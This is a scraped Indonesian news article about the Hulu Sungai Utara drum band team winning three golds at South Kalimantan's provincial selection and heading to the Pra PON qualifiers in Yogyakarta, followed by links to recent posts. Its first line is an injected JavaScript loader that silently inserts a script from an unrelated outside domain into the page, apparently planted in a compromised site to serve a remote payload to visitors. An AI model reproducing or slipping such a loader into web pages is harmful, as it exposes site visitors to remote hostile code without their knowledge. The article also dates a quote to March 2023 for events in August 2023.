(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Olahraga

Tim Drum Band HSU Wakili Kalsel ke Pra PON Yogyakarta


KANALKALIMANTAN.COM, AMUNTAI – Persatuan Drum Band Indonesia (PDBI) Kabupaten Hulu Sungai Utara (HSU) berhasil meraih 3 emas dan 1 perunggu pada seleksi tim provinsi oleh pengurus PDBI Provinsi Kalimantan Selatan (Kalsel) 13 Agustus 2023 lalu.

Alhasil dari raihan 3 emas tersebut, PDBI Kalsel kini menunjuk PDBI HSU mewakili Kalsel ke babak kualifikasi Pra PON di Yogyakarta yang akan dilaksanakan 2-13 September 2023 mendatang.

“Kemarin, seleksinya di masing-masing kabupaten untuk HSU berlangsung di Stadion Karias,” ungkap Pelatih PDBI HSU, Dody Pramana kepada Kanalkalimantan.com, Jumat (18/3/2023).

Lebih lanjut, ia mengakui untuk persiapan seleksi sendiri pihaknya bersama tim melakukan latihan rutin setiap hari sejak 8 Agustus lalu dengan memfokuskan atlet untuk karantina.

Baca juga: Berusia 108 Tahun Langgar Al Hinduan Banjarmasin Dibongkar, Saksi Bisu Muktamar NU Pertama di Luar Jawa

Sedangkan untuk persiapan babak kualifikasi atau Pra PON di Yogyakarta, pihaknya juga memaksimalkan latihan yang mana bakal membawa 22 atlet ke ajang tersebut.

“Untuk atlet sesuai dengan ketentuan panitia 11 putra dan 11 putri, jadi total 22 orang yang akan bertanding pada 17 nomor lomba,” imbuhnya.

Sementara itu, Ketua PDBI HSU Hj Rosenani mengaku bersyukur sembari mengucapkan terima kasih kepada para orangtua atlet yang telah mendukung serta memberikan support kepada PDBI HSU, sehingga bisa menjadi juara umum dan terpilih untuk mewakili kalsel pada babak kualifikasi PON nanti.

Baca juga: Persatukan Warga Berbagai Desa dari Balap Jukung di Aluhaluh

“Alhamdulillah, atas perjuangan anak-anak dan juga giat berlatih sehingga anak anak bisa menjadi seperti ini,dan juga kami mengucapkan terima kasih kepada para orangtua atlet atas support dan dukungan kepada PDBI HSU sehingga bisa seperti ini,” kata Rosenani.

Dirinya berharap dengan terpilihnya PDBI HSU mewakili Kalsel ke babak kuaifikasi PON bisa mengharumkan nama Kabupaten HSU dan Kalsel, dan anak anak yang bertanding disana bisa berprestasi.

”Kami memohon doa dan dukungan kepada masyarakat kabupaten HSU dan Kalsel, semoga kami diberikan kelancaran dan para atlet selalu diberi kesehatan sehingga bisa mengikuti pertandingan dan berprestasi,” imbuhnya

Baca juga: PLN UIP3B Kalimantan Siagakan 1.520 Personel Jaga Keandalan Selama Peringatan HUT Ke-78 RI

Adapun emas yang berhasil diraih oleh PDBI HSU pada seleksi tim provinsi kemarin yakni pada lomba ketahanan dan ketepatan berbaris jarak 8 kilometer putra yang dimana atlet drumband HSU berhasil mencetak waktu paling mendekati dengan target yakni 1:20:05 dari target 01:20:00.

Sementara pada lomba berbaris jarak pendek jarak 800 meter putra atlet drum band HSU juga berhasil mengalahkan Banjarbaru dengan Waktu Tercepat yakni 00:05:04.

Sedangkan, untuk atlet putri pada lomba ketepatan dan ketahanan berbaris cukup puas berada di posisi kedua atau perak, karena waktu tempuh lebih 5 menit, akan tetapi pada lomba berbaris jarak pendek putri jarak 800 meter berhasil meraih waktu tercepat dan mendapatkan emas. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Risa

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

27 menit ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

47 menit ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

1 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

2 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

2 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

2 jam ago

This website uses cookies.